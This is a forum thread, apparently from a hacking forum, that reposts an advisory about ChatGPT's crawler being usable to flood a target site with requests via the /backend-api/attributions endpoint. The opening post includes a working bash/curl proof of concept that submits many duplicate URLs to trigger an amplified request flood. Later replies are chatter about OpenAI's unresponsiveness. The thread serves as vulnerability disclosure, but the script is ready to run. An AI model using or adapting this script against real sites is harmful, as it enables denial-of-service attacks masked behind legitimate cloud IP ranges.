OpenAI: ChatGPT Crawler Vulnerability
by agent_peanut - Tuesday January 21, 2025 at 04:29 PM
#1
https://github.com/bf/security-advisorie...ability.md

So it looks like ChatGPT's crawler allows sending multiple requests to target using endpoint `/backend-api/attributions` due to a lack of deduplication and URL limiting in the API.
Attack method:
  • Attacker sends one request to ChatGPT's API with many duplicate URLs 
  • ChatGPT crawler automatically initiates parallel requests to the target 
  • Creates amplification effect where one attack request generates many crawler requests 
  • Crawler requests come from legitimate Microsoft Azure IP ranges

OpenAI has not responded, meaning they're scrambling this in the background somehow, if it makes any sense to them Smile
#!/bin/bash

# Part 1: Generate sequence and URLs
echo {1..50} | tr ' ' '\n' | (
  while read -r i;
    do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt";
  done
) |

# Part 2: Convert to JSON payload
jq -R -s -j -c '{ "urls": split("\n")[:-1] }' |

# Part 3: Send HTTP request
curl -v --http1.1 \
  -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, like Gecko) Chrome/133.0.0.1 Safari/535.32' \
  -H "content-type: application/json" \
  -H 'origin: https://www.chatgpt.com' \
  --data-binary @- -X POST 'https://chatgpt.com/backend-api/attributions'
Mr. Benedict Ivan Goodhello
Reply
#2
They also apparently had an IDOR vulnerability. Stuff is bad!
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Self-Ban | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you wish to be unbanned in the future.
Reply
#3
(01-26-2025, 05:24 AM)Zix Wrote: They also apparently had an IDOR vulnerability. Stuff is bad!

They know but give 0 fuck
Mr. Benedict Ivan Goodhello
Reply
#4
(01-27-2025, 06:52 PM)cocaine-ninja Wrote:
(01-26-2025, 05:24 AM)Zix Wrote: They also apparently had an IDOR vulnerability. Stuff is bad!

They know but give 0 fuck

As long as they make money no prob at all.
Reply
#5
informative... that sounds familiar to me, I once reported a captcha bypass to tiktok in the same way and I have never sent a report again.

but this is on another level... to warn so many times with no response... what a mess, the companies involved deserve to be punished.
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Leeching | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you feel this is incorrect.
Reply
#6
(01-28-2025, 07:11 AM)sadpuzzle Wrote: informative... that sounds familiar to me, I once reported a captcha bypass to tiktok in the same way and I have never sent a report again.

but this is on another level... to warn so many times with no response... what a mess, the companies involved deserve to be punished.

And that's why "OpenAI Strikes Deal With US Government to Use Its AI for Nuclear Weapon Security"
They're too big to care for such under-the-hood mishaps.

More on this here:
https://futurism.com/openai-signs-deal-u...n-security
Mr. Benedict Ivan Goodhello
Reply
#7
(02-01-2025, 07:55 PM)cocaine-ninja Wrote: And that's why "OpenAI Strikes Deal With US Government to Use Its AI for Nuclear Weapon Security"
They're too big to care for such under-the-hood mishaps.

More on this here:
https://futurism.com/openai-signs-deal-u...n-security

wow, this is really creepy
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Leeching | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you feel this is incorrect.
Reply
#8
If your product is bad, somebody will notice....
Reply
#9
(02-01-2025, 07:55 PM)cocaine-ninja Wrote:
(01-28-2025, 07:11 AM)sadpuzzle Wrote: informative... that sounds familiar to me, I once reported a captcha bypass to tiktok in the same way and I have never sent a report again.

but this is on another level... to warn so many times with no response... what a mess, the companies involved deserve to be punished.

And that's why "OpenAI Strikes Deal With US Government to Use Its AI for Nuclear Weapon Security"
They're too big to care for such under-the-hood mishaps.

More on this here:
https://futurism.com/openai-signs-deal-u...n-security

wait what the fuck actually ?? theres no background cybersec check?? no auditing??
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Leeching | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you feel this is incorrect.
Reply
#10
This news are really bad. Thanks for the information.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  OttoKit WordPress Plugin Admin Creation Vulnerability Under Active Exploitation SilverX 0 208 04-12-2025, 10:16 AM
Last Post: SilverX
  Alert! Hackers Exploiting Critical Vulnerability in VMware's Aria Operations Networks vulture 2 1,382 03-27-2025, 05:23 AM
Last Post: Th3B4h0z
  Critical PHP RCE vulnerability mass exploited in new attacks lulagain 0 357 03-11-2025, 10:13 PM
Last Post: lulagain
  OpenAI Bans Accounts Misusing ChatGPT for Surveillance and Influence Campaigns omega09 3 700 02-24-2025, 09:05 PM
Last Post: Crockett
  chatGPT&&Deepseek Heikaly 8 735 02-22-2025, 10:27 AM
Last Post: goat1111

Forum Jump:


 Users browsing this thread: